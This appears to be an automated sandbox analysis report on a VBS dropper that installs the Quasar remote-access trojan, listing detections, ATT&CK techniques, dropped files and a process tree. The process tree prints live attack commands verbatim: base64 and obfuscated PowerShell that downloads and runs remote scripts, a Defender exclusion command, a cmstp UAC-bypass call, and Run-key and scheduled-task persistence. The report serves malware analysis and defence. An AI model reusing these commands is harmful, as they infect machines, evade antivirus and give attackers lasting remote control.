quasar | b6a92aac9266f84cded9a49758a8f40221c9d6f424dd6408c83e7d44d548f4ae

Analysis

max time kernel
93s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
30-01-2025 08:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4.vbs
Size

272KB
MD5

46cb37a9ab59dfa43f3e4412c9482837
SHA1

4409a0080e076e663e8da28a02c1e3ced1f39ba9
SHA256

b6a92aac9266f84cded9a49758a8f40221c9d6f424dd6408c83e7d44d548f4ae
SHA512

7e186b8b077d9ad0f71dad3663d0c5ad283da8e7b242b53f482e2a54b3a32ef0a9c12a599baaf514a4231cb9dbf800f956066ecd0a563361ad2e1af461526219
SSDEEP

6144:xwP7sgNytypIj9WuIUaZ8z7zC2rPKwBEf+2y/twjgqM5NAq:y7syytHs3UoK2wB++2yu4

Score

10^/10

quasar discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/2200-99-0x00000000084B0000-0x000000000850E000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	2792	powershell.exe
5	2200	powershell.exe
8	2200	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
456	powershell.exe
2200	powershell.exe
2792	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
5052	google.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\googlecmd\google.exe	powershell.exe
File opened for modification	C:\Program Files (x86)\googlecmd\google.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	google.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
5080	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2792	powershell.exe
2792	powershell.exe
456	powershell.exe
456	powershell.exe
2200	powershell.exe
2200	powershell.exe
5052	google.exe
5052	google.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	5052	google.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 4036	1048	WScript.exe	80
PID 1048 wrote to memory of 4036	1048	WScript.exe	80
PID 4036 wrote to memory of 788	4036	cmd.exe	82
PID 4036 wrote to memory of 788	4036	cmd.exe	82
PID 788 wrote to memory of 2792	788	cmd.exe	84
PID 788 wrote to memory of 2792	788	cmd.exe	84
PID 2792 wrote to memory of 2092	2792	powershell.exe	86
PID 2792 wrote to memory of 2092	2792	powershell.exe	86
PID 2092 wrote to memory of 1876	2092	csc.exe	87
PID 2092 wrote to memory of 1876	2092	csc.exe	87
PID 2792 wrote to memory of 1744	2792	powershell.exe	88
PID 2792 wrote to memory of 1744	2792	powershell.exe	88
PID 788 wrote to memory of 5048	788	cmd.exe	94
PID 788 wrote to memory of 5048	788	cmd.exe	94
PID 788 wrote to memory of 2200	788	cmd.exe	95
PID 788 wrote to memory of 2200	788	cmd.exe	95
PID 788 wrote to memory of 2200	788	cmd.exe	95
PID 2200 wrote to memory of 3692	2200	powershell.exe	96
PID 2200 wrote to memory of 3692	2200	powershell.exe	96
PID 2200 wrote to memory of 3692	2200	powershell.exe	96
PID 2200 wrote to memory of 5052	2200	powershell.exe	98
PID 2200 wrote to memory of 5052	2200	powershell.exe	98
PID 2200 wrote to memory of 5052	2200	powershell.exe	98

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2792
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wuofq3x0\wuofq3x0.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2092
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D59.tmp" "c:\Users\Admin\AppData\Local\Temp\wuofq3x0\CSCB0125EC2887344CCA65CF9F450E61AC5.TMP"
        6⤵
        
        PID:1876
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\e3zmfode.inf
        5⤵
        
        PID:1744
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
      4⤵
      Adds Run key to start application
      PID:5048
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gbW9jcW5xaWtkZXZ3bm94amp1Z29seHh1YnJwaG5pcWZtaHpkeXNvZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1U2a0N0bnR6QTB2ZkwxQmhkZ2lHNWZTb1NjckcxQmVuMXhIOVlYeUExbkk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCd3S0hDbDVKSWZtWFVxdmRmNG8zRXZ3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGVuYWN5ZGd0Z2tmdmp5bW9xaXB3YWJ4dW9wamZvdGtyZ2FqeXd2dnkoJHBhcmFtX3Zhcil7CUlFWCAnJGt3YWRkdndvdmtucWNzZmRwZ29qdGFmbXo9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckbnBqb25zdm1ybGVhdHJ0dHZrZGd1cG52Zz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGlxaG1lanJvZHBnbnpoc3JkbGdiZHdwdXA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygka3dhZGR2d292a25xY3NmZHBnb2p0YWZteiwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkaXFobWVqcm9kcGduemhzcmRsZ2Jkd3B1cC5Db3B5VG8oJG5wam9uc3ZtcmxlYXRydHR2a2RndXBudmcpOwkkaXFobWVqcm9kcGduemhzcmRsZ2Jkd3B1cC5EaXNwb3NlKCk7CSRrd2FkZHZ3b3ZrbnFjc2ZkcGdvanRhZm16LkRpc3Bvc2UoKTsJJG5wam9uc3ZtcmxlYXRydHR2a2RndXBudmcuRGlzcG9zZSgpOwkkbnBqb25zdm1ybGVhdHJ0dHZrZGd1cG52Zy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGpiZm9hbHhsaHhndmFmbHJiamN3bnllaHV6dWhldG9xcW54KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeXFiZ2V5Ym5pZmJvYW5ibW1wYm1ndmNrcHFlZ3VkbGJtd2Z0cGl6cj1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGV6cWJyZGR4Zm9xZ25pamRucXJvdXV0ZnRhY2RoaXdlcWppZ2VhdGxuZ2JnbWZuZW1jPSR5cWJnZXlibmlmYm9hbmJtbXBibWd2Y2twcWVndWRsYm13ZnRwaXpyLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGV6cWJyZGR4Zm9xZ25pamRucXJvdXV0ZnRhY2RoaXdlcWppZ2VhdGxuZ2JnbWZuZW1jLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kc3pxaW1zY3lob2dsbWtvdGxxdXNpdGZvdSA9ICRlbnY6VVNFUk5BTUU7JGh0Z3h1YXJtdGtibGN2ZnpxaXp0dmRidnIgPSAnQzpcVXNlcnNcJyArICRzenFpbXNjeWhvZ2xta290bHF1c2l0Zm91ICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaHRneHVhcm10a2JsY3ZmenFpenR2ZGJ2cjskZ2NodGs9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRodGd4dWFybXRrYmxjdmZ6cWl6dHZkYnZyKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeGt0IGluICRnY2h0aykgewlpZiAoJHhrdC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZXJrZm89JHhrdC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kc255cmdodnF0dWJrbmFlaHRreXJodGh0Z2JuZ2FodXFybnk9W3N0cmluZ1tdXSRlcmtmby5TcGxpdCgnXCcpO0lFWCAnJHR6ZGZmZ21memFjdHpua3pneGF2emZma2Z1b3BtemtzYWNrPWVuYWN5ZGd0Z2tmdmp5bW9xaXB3YWJ4dW9wamZvdGtyZ2FqeXd2dnkgKG1vY3FucWlrZGV2d25veGpqdWdvbHh4dWJycGhuaXFmbWh6ZHlzb2YgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkc255cmdodnF0dWJrbmFlaHRreXJodGh0Z2JuZ2FodXFybnlbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaXFlc2x2bmh0ZGhuc3BobnRycnpvdXNhbHJ3dGFwa3R4Y2M9ZW5hY3lkZ3Rna2Z2anltb3FpcHdhYnh1b3BqZm90a3JnYWp5d3Z2eSAobW9jcW5xaWtkZXZ3bm94amp1Z29seHh1YnJwaG5pcWZtaHpkeXNvZiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRzbnlyZ2h2cXR1YmtuYWVodGt5cmh0aHRnYm5nYWh1cXJueVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtqYmZvYWx4bGh4Z3ZhZmxyYmpjd255ZWh1enVoZXRvcXFueCAkdHpkZmZnbWZ6YWN0em5remd4YXZ6ZmZrZnVvcG16a3NhY2sgJG51bGw7amJmb2FseGxoeGd2YWZscmJqY3dueWVodXp1aGV0b3FxbnggJGlxZXNsdm5odGRobnNwaG50cnJ6b3VzYWxyd3RhcGt0eGNjICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2200
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "google" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3692
    - - C:\Program Files (x86)\googlecmd\google.exe
        
        "C:\Program Files (x86)\googlecmd\google.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\googlecmd\google.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73a1f69d6d926c14d5f97f1f3f39f570

SHA1
8c7ec38800a97f84eb462db995a85b59425617a4

SHA256
6de52d200c33080949e5139d626eadf9d88fd1f45cec1c53b6fe6f915e459254

SHA512
89ddc408f42436ac6438a644da469ce70b3a2f44cadaf791c2bd7d35dbc2a1c5c43c1716520f7f98006d94f972386974495c061a0f059ff35c55283bbabb7f3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D59.tmp

Filesize
1KB

MD5
04e2397074b52ab525fcdeb25fc0ae9f

SHA1
d89eca879a4e50b1ffc2356404e94c2fd8ccdcfd

SHA256
053a9f9c11de4458b0f56ac8524d188ce4c9479eefcdccb3e1471b568ad69fc3

SHA512
a7502a5b8676d61decf2e452e3355d63a04952fc951e6875513b265a8035bd293ef68afe7428d1ec67e244f19d2cb5e15db4fb9ef9c1b5652872ecca906930c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsful4rc.bqe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
264KB

MD5
48ef1bec452f6cbb0c43cad8e15c822d

SHA1
7709389fe88ac8498d6121367ef2ede187c6f2e2

SHA256
b34c6ad373f346592e7a941cb11d8bd099df64d4fbb646f90d0aed9411804fe1

SHA512
ed8f0b833aab924c1dfe02ca36ce57ec2ecc4ab17a93d3c0cb9a5597c444b743378be63c725574bf40157b04834ed95c5763bae22bc7bc5097ad6c5007b5c589

Download Submit
C:\Users\Admin\AppData\Local\Temp\wuofq3x0\wuofq3x0.dll

Filesize
4KB

MD5
47e126806c8b3fd5ce34386feaf3d2d6

SHA1
fc061cd7eb0a7988f909550c484fd15946033ae7

SHA256
4f3d58953b6fe28214a35a877d9e0702894a8a1aafe1c11273f2a3a942210c09

SHA512
e9c9c6b5fce2978f78c8673dceb5eccfcb0ad0d8d7df8b655b36fe0d01b3ade4d707f2554659d8cd5ffc6f5a1ee73601b8aca3003f7790668199d173f3667053

Download Submit
C:\windows\temp\e3zmfode.inf

Filesize
667B

MD5
05662b83ff7db6317e391454787598d8

SHA1
d290d661e282eb757a5292fe5ee8f2f8517232ab

SHA256
0322b78214d9fb1d40d9bf162a44f9a5fe13fcb21c96b8b0f0e289e939a9fa5c

SHA512
f1b302c58804c79e350cd2f30a2f08f762551cc8790ed3f0b877efd8915996587734afe9f0b4185cfbbcf589aa9b04762dd80d9d8141a5bf647de692299161e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wuofq3x0\CSCB0125EC2887344CCA65CF9F450E61AC5.TMP

Filesize
652B

MD5
e9f69e9bc1bc651e6045a363ecfa0856

SHA1
bcc1e7addc7418e6dc3f4a0d0f00309823b8e61c

SHA256
68a924feba320e4e389019c3dccc596c7cdd93e89edd987bb236cc9d30e2ec9e

SHA512
9596221b0e8b8d06ac54d9fe92e6bbbe435fda165b3a4ce2a5e866f23608a834bfe493d73e01067fb996c7da5b30cf754f0ed7e6ddfb7afdc7b83d9337080a8b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wuofq3x0\wuofq3x0.0.cs

Filesize
2KB

MD5
b126ac3da39ffa35cb857267cbc70cbb

SHA1
59dbfa9af3f2fa2c3bda0118ef779c0238675721

SHA256
6e6dd39153a84b94b4f309a4c4521260cbdd8a6922ade46096f42da39bc20b93

SHA512
c15d8ef56529792b983d55736c283ad6ae5c95bcd661053292f95c51f535109e4c59cf391e1c724be97e52ee4bfa213a380021f51c4e576201c03cfc4647acbc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wuofq3x0\wuofq3x0.cmdline

Filesize
369B

MD5
dccc8fd0a25f7b45b62713c5f41b714a

SHA1
af1b7ab4f198e585299082a7e6b018d7d401aa55

SHA256
14169698cfa78c6f4e5b9f6490ccc535594565e2fc86b7bd58c2cb503e77e11c

SHA512
c3b1a7d2de6b8e46236bb34a6b3e4f4a7d1d95e3522d1ca0cd02756617a93b209b287bba6ef178e3b455de19fe59cfcc056d97debea282f99d5e576c524c3d19

Download Submit
memory/2200-69-0x0000000005FF0000-0x0000000006344000-memory.dmp

Filesize
3.3MB

Download
memory/2200-77-0x0000000071340000-0x0000000071694000-memory.dmp

Filesize
3.3MB

Download
memory/2200-103-0x0000000005430000-0x000000000546C000-memory.dmp

Filesize
240KB

Download
memory/2200-102-0x0000000008880000-0x0000000008892000-memory.dmp

Filesize
72KB

Download
memory/2200-101-0x00000000086A0000-0x0000000008732000-memory.dmp

Filesize
584KB

Download
memory/2200-100-0x0000000008B70000-0x0000000009114000-memory.dmp

Filesize
5.6MB

Download
memory/2200-99-0x00000000084B0000-0x000000000850E000-memory.dmp

Filesize
376KB

Download
memory/2200-98-0x0000000008480000-0x00000000084B4000-memory.dmp

Filesize
208KB

Download
memory/2200-97-0x0000000007AF0000-0x0000000007AF8000-memory.dmp

Filesize
32KB

Download
memory/2200-55-0x00000000030D0000-0x0000000003106000-memory.dmp

Filesize
216KB

Download
memory/2200-56-0x0000000005950000-0x0000000005F78000-memory.dmp

Filesize
6.2MB

Download
memory/2200-57-0x00000000056F0000-0x0000000005712000-memory.dmp

Filesize
136KB

Download
memory/2200-58-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download
memory/2200-59-0x0000000005F80000-0x0000000005FE6000-memory.dmp

Filesize
408KB

Download
memory/2200-95-0x0000000008480000-0x0000000008488000-memory.dmp

Filesize
32KB

Download
memory/2200-71-0x00000000064C0000-0x00000000064DE000-memory.dmp

Filesize
120KB

Download
memory/2200-72-0x0000000006560000-0x00000000065AC000-memory.dmp

Filesize
304KB

Download
memory/2200-73-0x0000000007E00000-0x000000000847A000-memory.dmp

Filesize
6.5MB

Download
memory/2200-74-0x00000000075A0000-0x00000000075BA000-memory.dmp

Filesize
104KB

Download
memory/2200-75-0x0000000007BF0000-0x0000000007C22000-memory.dmp

Filesize
200KB

Download
memory/2200-76-0x0000000070F30000-0x0000000070F7C000-memory.dmp

Filesize
304KB

Download
memory/2200-94-0x00000000084A0000-0x00000000084BA000-memory.dmp

Filesize
104KB

Download
memory/2200-87-0x0000000007C30000-0x0000000007C4E000-memory.dmp

Filesize
120KB

Download
memory/2200-88-0x0000000007C60000-0x0000000007D03000-memory.dmp

Filesize
652KB

Download
memory/2200-89-0x0000000007D60000-0x0000000007D6A000-memory.dmp

Filesize
40KB

Download
memory/2200-90-0x0000000008520000-0x00000000085B6000-memory.dmp

Filesize
600KB

Download
memory/2200-91-0x0000000007D90000-0x0000000007DA1000-memory.dmp

Filesize
68KB

Download
memory/2200-92-0x0000000007DC0000-0x0000000007DCE000-memory.dmp

Filesize
56KB

Download
memory/2200-93-0x0000000007DD0000-0x0000000007DE4000-memory.dmp

Filesize
80KB

Download
memory/2792-32-0x00000234346B0000-0x00000234346B8000-memory.dmp

Filesize
32KB

Download
memory/2792-5-0x0000023433E90000-0x0000023433EB2000-memory.dmp

Filesize
136KB

Download
memory/2792-52-0x00007FFC774A0000-0x00007FFC77F61000-memory.dmp

Filesize
10.8MB

Download
